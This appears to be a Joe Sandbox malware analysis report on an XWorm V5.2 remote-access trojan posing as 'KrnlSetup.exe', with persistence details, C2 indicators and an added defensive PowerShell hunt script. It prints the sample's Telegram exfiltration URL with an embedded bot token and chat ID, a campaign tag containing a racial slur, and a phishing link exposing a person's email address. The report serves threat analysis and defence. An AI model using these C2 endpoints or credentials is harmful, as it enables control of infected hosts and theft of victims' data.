                                    Source: Yara match | File source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                                    Source: Yara match | File source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara match | File source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                                    Source: Yara match | File source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000002.2614356137.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    MITRE ATT&CK Matrix (bracketed figures are the badge numbers shown next to matched techniques in the original matrix; techniques without a figure are unmatched template entries)

                                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                                    Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                                    Execution: Windows Management Instrumentation [12]; Scheduled Task/Job [1]; PowerShell [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                                    Persistence: Scripting [1]; DLL Side-Loading [1]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                                    Privilege Escalation: DLL Side-Loading [1]; Process Injection [11]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                                    Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [21]; Software Packing [2]; DLL Side-Loading [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [151]; Process Injection [11]
                                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                                    Discovery: File and Directory Discovery [1]; System Information Discovery [23]; Security Software Discovery [541]; Process Discovery [1]; Virtualization/Sandbox Evasion [151]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Owner/User Discovery; Network Sniffing
                                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                                    Collection: Archive Collected Data [11]; Screen Capture [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                                    Command and Control: Web Service [2]; Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Commonly Used Port; Application Layer Protocol; Web Protocols
                                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    Behavior Graph
                                    ID: 1572248 | Sample: KrnlSetup.exe | Start date: 10/12/2024 | Architecture: WINDOWS | Score: 100
                                    Contacted domains: pastebin.com (Connects to a pastebin service (likely for C&C)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); ip-api.com
                                    Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                                    Process tree:
                                    KrnlSetup.exe (started)
                                        Network: 115.69.183.222 (ports 37593, 49751, 49797; TRUSTPOWERLTD-AS-APTrustPowerLtdNZ, New Zealand); ip-api.com 208.95.112.1 (ports 49730, 80; TUT-ASUS, United States); 2 other IPs or domains
                                        Dropped: C:\ProgramData\ntoskrnl.exe (PE32); C:\Users\user\AppData\...\KrnlSetup.exe.log (CSV)
                                        Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 4 other signatures
                                        powershell.exe (started) | Signature: Loading BitLocker PowerShell Module | started conhost.exe
                                        powershell.exe (started) | started conhost.exe
                                        powershell.exe (started) | started conhost.exe
                                        4 other processes | started conhost.exe (3 instances) and 2 other processes
                                    ntoskrnl.exe (started, 3 instances)
                                        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source                       Detection  Scanner         Label
KrnlSetup.exe                74%        ReversingLabs   ByteCode-MSIL.Spyware.AsyncRAT
KrnlSetup.exe                100%       Avira           TR/Spy.Gen
KrnlSetup.exe                100%       Joe Sandbox ML  -

Dropped files
Source                       Detection  Scanner         Label
C:\ProgramData\ntoskrnl.exe  100%       Avira           TR/Spy.Gen
C:\ProgramData\ntoskrnl.exe  100%       Joe Sandbox ML  -
C:\ProgramData\ntoskrnl.exe  74%        ReversingLabs   ByteCode-MSIL.Spyware.AsyncRAT

(The vendor labels are generic .NET spyware/RAT families; the check-in URL in the URL table identifies the sample as XWorm V5.2.)

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source                                Detection  Scanner          Label
https://go.microsoft.co               0%         Avira URL Cloud  safe
http://crl.mic                        0%         Avira URL Cloud  safe
http://www.micom/pkiops/Docs/ry.htm0  0%         Avira URL Cloud  safe
Contacted domains
Name              IP               Active  Malicious  Antivirus Detection  Reputation
ip-api.com        208.95.112.1     true    false      -                    high
api.telegram.org  149.154.167.220  true    false      -                    high
pastebin.com      104.20.3.235     true    false      -                    high

URLs from the malware configuration / network traffic
Name  Malicious  Antivirus Detection  Reputation
https://pastebin.com/raw/5FinF5Mf  false  -  high
https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzz  false  -  high
http://ip-api.com/line/?fields=hosting  false  -  high

The api.telegram.org request is the sample's check-in: the bot token and chat_id embedded in the URL identify the operator's Telegram bot and chat, and the URL-encoded text parameter is an XWorm V5.2 "New Clinet" notification carrying the client ID EF8C18E803B11A27265E, the username, OS name, USB/CPU/GPU/RAM values and the campaign group tag. The pastebin raw URL is fetched at start-up (the graph marks it as likely C&C related), and the hosting field queried from ip-api.com reports whether the host's public IP belongs to a hosting or data-center provider, a common sandbox check.
URLs found in process memory strings
(Name; Source as process, memory dump; Malicious; Antivirus Detection; Reputation)

http://nuget.org/NuGet.exe
  Source: powershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://api.telegram.org
  Source: KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

http://pesterbdd.com/images/Pester.png
  Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://api.telegram.org/bot
  Source: KrnlSetup.exe, ntoskrnl.exe.0.dr
  Malicious: false  Antivirus Detection: -  Reputation: high

https://go.microsoft.co
  Source: powershell.exe, 00000009.00000002.2034848231.00000231C178C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: Avira URL Cloud: safe  Reputation: unknown

http://schemas.xmlsoap.org/soap/encoding/
  Source: powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

http://www.apache.org/licenses/LICENSE-2.0.html
  Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

http://schemas.xmlsoap.org/wsdl/
  Source: powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

http://www.micom/pkiops/Docs/ry.htm0
  Source: powershell.exe, 0000000B.00000002.2242720831.0000019028D4D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: Avira URL Cloud: safe  Reputation: unknown

https://contoso.com/
  Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://nuget.org/nuget.exe
  Source: powershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://contoso.com/License
  Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

http://crl.mic
  Source: powershell.exe, 00000009.00000002.2041628498.00000231C1B87000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: Avira URL Cloud: safe  Reputation: unknown

https://contoso.com/Icon
  Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://aka.ms/pscore68
  Source: powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://github.com/Pester/Pester
  Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=59991
  Source: KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Antivirus Detection: -  Reputation: high

Most of the powershell.exe strings (nuget.org, contoso.com, Pester, schemas.xmlsoap.org, aka.ms) are boilerplate from PowerShell's own modules and are not sample indicators; the KrnlSetup.exe and ntoskrnl.exe entries for api.telegram.org are the ones that matter.
Contacted IPs
IP               Domain            Country         ASN    ASN Name                            Malicious
104.20.3.235     pastebin.com      United States   13335  CLOUDFLARENETUS                     false
208.95.112.1     ip-api.com        United States   53334  TUT-ASUS                            false
149.154.167.220  api.telegram.org  United Kingdom  62041  TELEGRAMRU                          false
115.69.183.222   unknown           New Zealand     55850  TRUSTPOWERLTD-AS-APTrustPowerLtdNZ  true
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1572248
                                                                              Start date and time:2024-12-10 10:03:05 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 6m 45s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:24
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:KrnlSetup.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@28/24@3/4
                                                                              EGA Information:
                                                                              • Successful, ratio: 12.5%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 84
                                                                              • Number of non-executed functions: 7
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 52.149.20.212
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target ntoskrnl.exe, PID 2328 because it is empty
                                                                              • Execution Graph export aborted for target ntoskrnl.exe, PID 5428 because it is empty
                                                                              • Execution Graph export aborted for target ntoskrnl.exe, PID 652 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 1516 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 2056 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 3848 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • VT rate limit hit for: KrnlSetup.exe
Time      Type             Description
04:04:01  API Interceptor  63x Sleep call for process: powershell.exe modified
04:04:56  API Interceptor  152x Sleep call for process: KrnlSetup.exe modified
09:04:56  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
09:04:57  Task Scheduler   Run new task: ntoskrnl path: C:\ProgramData\ntoskrnl.exe
09:05:04  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
09:05:12  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
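The timeline above records three independent persistence mechanisms for the same dropped file (a Run value, a scheduled task and a Startup-folder shortcut, all named ntoskrnl and all pointing at C:\ProgramData\ntoskrnl.exe). The following PowerShell hunt script checks all three locations on a suspect host and flags the name/location mismatch. It is an added example written for this page, not part of the Joe Sandbox report or of the analysed sample; the function and parameter names, the inclusion of HKLM Run keys, and the rule that an ntoskrnl.exe anywhere outside %SystemRoot%\System32 counts as an anomaly are the author's assumptions.

```powershell
# Added hunt script written for this page; it is not part of the Joe Sandbox
# report or of the analysed sample. Assumptions (the author's, not the report's):
# the function and parameter names, and the rule that an ntoskrnl.exe anywhere
# outside %SystemRoot%\System32 is a location anomaly (the sample dropped its
# copy to C:\ProgramData and registered it under the name "ntoskrnl").
function Find-NtoskrnlPersistence {
    [CmdletBinding()]
    param(
        [string]$FileName = 'ntoskrnl.exe',   # dropped file name from the report
        [string]$TaskName = 'ntoskrnl'        # scheduled task / Run value / .lnk name from the report
    )

    $system32 = Join-Path $env:SystemRoot 'System32'

    # One record per reference found. The real kernel image lives in System32,
    # so any other location is flagged. The file is hashed when it still exists
    # so the value can be compared with the hashes in the report.
    function New-Finding([string]$Source, [string]$Target) {
        $path = $Target.Trim('"').Trim()
        $hash = $null
        if ($path -and (Test-Path -LiteralPath $path -PathType Leaf)) {
            $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        }
        [pscustomobject]@{
            Source          = $Source
            Target          = $path
            LocationAnomaly = ($path -notlike "$system32\*")
            SHA256          = $hash
        }
    }

    # 1. Run keys. The report shows the value "ntoskrnl" under HKCU\...\Run
    #    (native and 64-bit views); the HKLM keys are included for completeness.
    $metaProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    )
    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($metaProps -contains $p.Name) { continue }   # provider metadata, not registry values
            if ($p.Name -eq $TaskName -or "$($p.Value)" -like "*$FileName*") {
                New-Finding -Source "Registry: $key\$($p.Name)" -Target "$($p.Value)"
            }
        }
    }

    # 2. Scheduled tasks: match on the task name or on an action that executes the file.
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            $exe = "$($action.Execute)"
            if ($task.TaskName -eq $TaskName -or $exe -like "*$FileName*") {
                New-Finding -Source "ScheduledTask: $($task.TaskPath)$($task.TaskName)" -Target $exe
            }
        }
    }

    # 3. Startup-folder shortcuts (per-user and all-users): resolve each .lnk target.
    $shell = New-Object -ComObject WScript.Shell
    foreach ($folder in @([Environment]::GetFolderPath('Startup'),
                          [Environment]::GetFolderPath('CommonStartup'))) {
        Get-ChildItem -Path $folder -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
            $target = $shell.CreateShortcut($_.FullName).TargetPath
            if ($_.BaseName -eq $TaskName -or $target -like "*$FileName*") {
                New-Finding -Source "Startup: $($_.FullName)" -Target $target
            }
        }
    }

    # 4. The drop location itself, in case the persistence entries were already cleaned up.
    Get-ChildItem -Path $env:ProgramData -Filter $FileName -File -ErrorAction SilentlyContinue |
        ForEach-Object { New-Finding -Source "File: $($_.DirectoryName)" -Target $_.FullName }
}

# Usage: any record with LocationAnomaly = True is worth triaging; compare SHA256 with the report.
Find-NtoskrnlPersistence | Format-Table -AutoSize
```

Run it in an elevated session so the HKLM keys and all scheduled tasks are readable; on a clean host the function returns nothing.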
Joe Sandbox View / Context: IPs
(Match; Associated Sample Name / URL; Detection; Threat Name; Context)

104.20.3.235
  cr_asm3.ps1                    malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  gabe.ps1                       malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  cr_asm.ps1                     malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  cr_asm_atCAD.ps1               malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  vF20HtY4a4.exe                 malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  OSLdZanXNc.exe                 malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  5UIy3bo46y.dll                 malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  Lm9IJ4r9oO.exe                 malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  BeginSync lnk.lnk              malicious  Unknown  Context: pastebin.com/raw/sA04Mwk2
  sostener.vbs                   malicious  Njrat    Context: pastebin.com/raw/V9y5Q5vv

208.95.112.1
  Wh2c6sgwRo.exe                 malicious  DCRat, PureLog Stealer, zgRAT  Context: ip-api.com/line/?fields=hosting
  mu3JuAyrj5.exe                 malicious  PureLog Stealer, zgRAT  Context: ip-api.com/json/
  interior-design-villa-a23.lnk  malicious  MalLnk  Context: ip-api.com/json/?fields=8195
  file.exe                       malicious  Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar  Context: ip-api.com/line/?fields=hosting
  run.cmd                        malicious  Unknown  Context: ip-api.com/json/?fields=8195
  file.exe                       malicious  Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm  Context: ip-api.com/line/?fields=hosting
  file.exe                       malicious  AsyncRAT, XWorm  Context: ip-api.com/line/?fields=hosting
  f5ATZ1i5CU.exe                 malicious  RedLine, XWorm  Context: ip-api.com/line/?fields=hosting
  R55-RFQ.exe                    malicious  AgentTesla  Context: ip-api.com/line/?fields=hosting
  YXHoexbTFp.exe                 malicious  PureLog Stealer, zgRAT  Context: ip-api.com/json/
Joe Sandbox View / Context: Domains
(Match; Associated Sample Name / URL; Detection; Threat Name; Context)

ip-api.com
  Wh2c6sgwRo.exe                 malicious  DCRat, PureLog Stealer, zgRAT  Context: 208.95.112.1
  mu3JuAyrj5.exe                 malicious  PureLog Stealer, zgRAT  Context: 208.95.112.1
  interior-design-villa-a23.lnk  malicious  MalLnk  Context: 208.95.112.1
  file.exe                       malicious  Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar  Context: 208.95.112.1
  run.cmd                        malicious  Unknown  Context: 208.95.112.1
  file.exe                       malicious  Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm  Context: 208.95.112.1
  file.exe                       malicious  AsyncRAT, XWorm  Context: 208.95.112.1
  f5ATZ1i5CU.exe                 malicious  RedLine, XWorm  Context: 208.95.112.1
  R55-RFQ.exe                    malicious  AgentTesla  Context: 208.95.112.1
  YXHoexbTFp.exe                 malicious  PureLog Stealer, zgRAT  Context: 208.95.112.1

pastebin.com
  Revo.Uninstaller.Pro.v5.3.4.exe  malicious  Unknown  Context: 104.20.3.235
  Revo.Uninstaller.Pro.v5.3.4.exe  malicious  Unknown  Context: 104.20.4.235
  rrats.exe                        malicious  AsyncRAT  Context: 172.67.19.24
  Q8o0Mx52Fd.exe                   malicious  Unknown  Context: 104.20.3.235
  Q8o0Mx52Fd.exe                   malicious  Unknown  Context: 104.20.3.235
  Setup.exe                        malicious  LummaC Stealer  Context: 104.20.4.235
  Microsoft.doc                    malicious  Unknown  Context: 104.20.3.235
  a9YMw44iQq.exe                   malicious  AsyncRAT, XWorm  Context: 172.67.19.24
  nlGOh9K5X5.exe                   malicious  Xmrig  Context: 172.67.19.24
  cJ6xbAA5Rn.exe                   malicious  Unknown  Context: 172.67.19.24

api.telegram.org
  SALARY_RECEIPT.exe             malicious  Snake Keylogger, VIP Keylogger  Context: 149.154.167.220
  interior-design-villa-a23.lnk  malicious  MalLnk  Context: 149.154.167.220
  FATR98765678000.doc            malicious  Snake Keylogger, VIP Keylogger  Context: 149.154.167.220
  APQSKVTvd60SdAM.exe            malicious  Snake Keylogger, VIP Keylogger  Context: 149.154.167.220
  run.cmd                        malicious  Unknown  Context: 149.154.167.220
  https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com  malicious  HTMLPhisher  Context: 149.154.167.220
  jXN37dkptv.exe                 malicious  Snake Keylogger, VIP Keylogger  Context: 149.154.167.220
  1mr7lpFIVI.exe                 malicious  Unknown  Context: 149.154.167.220
  eEiHdLSfum.exe                 malicious  Unknown  Context: 149.154.167.220
  eEiHdLSfum.exe                 malicious  Unknown  Context: 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | SALARY_RECEIPT.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | interior-design-villa-a23.lnk | malicious | MalLnk | 149.154.167.220
TELEGRAMRU | APQSKVTvd60SdAM.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | run.cmd | malicious | Unknown | 149.154.167.220
